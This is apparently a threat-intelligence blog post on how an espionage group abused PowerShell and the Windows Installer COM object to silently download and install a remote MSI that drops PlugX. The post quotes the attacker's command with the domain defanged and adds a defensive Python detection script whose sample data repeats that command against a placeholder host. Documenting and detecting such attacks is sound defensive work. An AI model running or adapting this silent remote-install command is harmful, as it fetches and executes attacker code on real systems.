010. Do You Detect This Example of PowerShell Abuse?

Hello everyone! As you know, PowerShell can be used by the adversary to solve lots of problems, and it's almost impossible to cover all available procedures. Today we are going to look at another curious example of PowerShell abuse.

Recently Recorded Future released a report on RedDelta (we track this cluster of espionage activity as Horned Werewolf), which targeted Taiwan, Mongolia, and Southeast Asia with PlugX.

Just like Sticky Werewolf, which we discussed a few days ago, the adversary leveraged malicious MSC files. These files abused PowerShell to install a malicious MSI file from a remote resource:

powershell.exe -w hidden ($ceed=new-object -comobject ‘WindowsInstaller.Installer’); ($ceed.uilevel = 2); ($ceed.installproduct(‘https[:]//versaillesinfo[.]com/brjwcabz’,’REMOVE=ALL’)); ($ceed.installproduct(‘https[:]//versaillesinfo[.]com/brjwcabz’))

Note that the malicious MSI file doesn't have an .msi extension. The threat actors leveraged the WindowsInstaller.Installer COM object to silently (Installer.UILevel = 2) remove (REMOVE=ALL) and then install the malicious MSI file.
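The technique described above leaves a distinctive shape in process command-line telemetry (Sysmon Event ID 1 or Windows Security 4688 with command-line auditing enabled). The following Python script is an added example, not code from the post or from the Recorded Future report: it scores command lines on the indicators that make this procedure stand out (Installer COM object, InstallProduct pointed at an http(s) URL, UILevel set to 2, REMOVE=ALL, hidden window, and a remote source without an .msi extension). The sample events and the URL in them are constructed placeholders; smart quotes are normalized because PowerShell accepts them as quote characters and the command in the post uses them.

```python
import re
from typing import Dict, List

# Constructed sample process-creation command lines (not real telemetry; the
# domain is a placeholder). Sample 0 mirrors the shape of the command in the
# post, smart quotes included, so the normalization step is exercised.
SAMPLE_EVENTS: List[str] = [
    "powershell.exe -w hidden ($inst=new-object -comobject \u2018WindowsInstaller.Installer\u2019); "
    "($inst.uilevel = 2); ($inst.installproduct(\u2018https://example.invalid/brjwcabz\u2019,\u2019REMOVE=ALL\u2019)); "
    "($inst.installproduct(\u2018https://example.invalid/brjwcabz\u2019))",
    'msiexec.exe /i "C:\\Temp\\tool.msi" /qn',
    "powershell.exe $i = New-Object -ComObject WindowsInstaller.Installer; $i.InstallProduct('C:\\pkg\\app.msi')",
    "powershell.exe -NoProfile -Command Get-Process",
]

# Map the four common smart-quote code points to their ASCII equivalents.
_SMART_QUOTES = str.maketrans({"\u2018": "'", "\u2019": "'", "\u201c": '"', "\u201d": '"'})


def normalize(cmdline: str) -> str:
    """Lower-case the command line and replace smart quotes so regexes see plain quotes."""
    return cmdline.translate(_SMART_QUOTES).lower()


# InstallProduct whose first argument is an http(s) URL; group 1 captures the URL.
_REMOTE_SOURCE = re.compile(r"\.installproduct\s*\(\s*['\"]?(https?://[^'\")\s,]+)")
# -w hidden and its abbreviations/long form (-w h, -win hidden, -windowstyle hidden).
_HIDDEN_WINDOW = re.compile(r"-w(?:in(?:dowstyle)?)?\s+h(?:id(?:den)?)?\b")


def installer_indicators(cmdline: str) -> List[str]:
    """Return the list of Installer-abuse indicators present in one command line."""
    text = normalize(cmdline)
    found: List[str] = []
    if "windowsinstaller.installer" in text:
        found.append("installer_com_object")
    if re.search(r"\.installproduct\s*\(", text):
        found.append("installproduct_call")
    match = _REMOTE_SOURCE.search(text)
    if match:
        found.append("remote_msi_source")
        # The post notes the remote package did not carry an .msi extension.
        if not match.group(1).endswith(".msi"):
            found.append("non_msi_extension")
    if re.search(r"\.uilevel\s*=\s*2\b", text):
        found.append("silent_ui_level")
    if "remove=all" in text:
        found.append("remove_all_property")
    if _HIDDEN_WINDOW.search(text):
        found.append("hidden_window")
    return found


def verdict(indicators: List[str]) -> str:
    """Collapse indicators into a triage verdict: high, medium, or none."""
    present = set(indicators)
    if {"installer_com_object", "remote_msi_source"} <= present:
        return "high"      # COM installer fetching a package from the network
    if {"installer_com_object", "installproduct_call"} <= present:
        return "medium"    # scripted install from a local path; review, may be admin tooling
    return "none"


def scan(events: List[str]) -> List[Dict[str, object]]:
    """Run the detection over a list of command lines and return only the hits."""
    hits: List[Dict[str, object]] = []
    for index, line in enumerate(events):
        indicators = installer_indicators(line)
        level = verdict(indicators)
        if level != "none":
            hits.append({"index": index, "verdict": level, "indicators": indicators})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The "medium" tier exists because the Installer COM object is also used by legitimate deployment scripts with a local package path; the combination with a remote URL, a hidden window and a package lacking an .msi extension is what pushes the verdict to "high". PowerShell script block logging (Event ID 4104) would surface the same content even if the command line were passed in encoded form, so the same indicator checks can be applied to that source.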

The MSI file drops three files related to a customized PlugX variant.

Yes, it's almost impossible to cover all available PowerShell abuse variations, so it's important to cover at least those used by real adversaries.

See you tomorrow!
